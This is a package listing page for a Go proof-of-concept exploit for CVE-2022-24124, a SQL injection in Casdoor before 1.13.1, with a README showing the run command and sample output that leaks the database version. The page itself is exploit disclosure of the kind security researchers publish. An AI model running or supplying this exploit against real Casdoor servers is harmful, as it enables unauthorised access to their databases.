cve-2022-24124

command module
v0.0.0-...-ef693c8 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Mar 1, 2022 License: MIT Imports: 8 Imported by: 0

README

POC for CVE-2022-24124

Exploit Code for CVE-2022-24124 aka Casdoor SQL Injection

Exploit Links: [ExploitDB-50792] [PacketStormSecurity]

Expected outcome: Dump SQL database version on host running Casdoor < 1.13.1

Intended only for educational and testing in corporate environments.

Exploit Usage
Barricade➜ go run exploit.go -u http://127.0.0.1:8080

-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)

[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1

Documentation

The Go Gopher

There is no documentation for this package.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL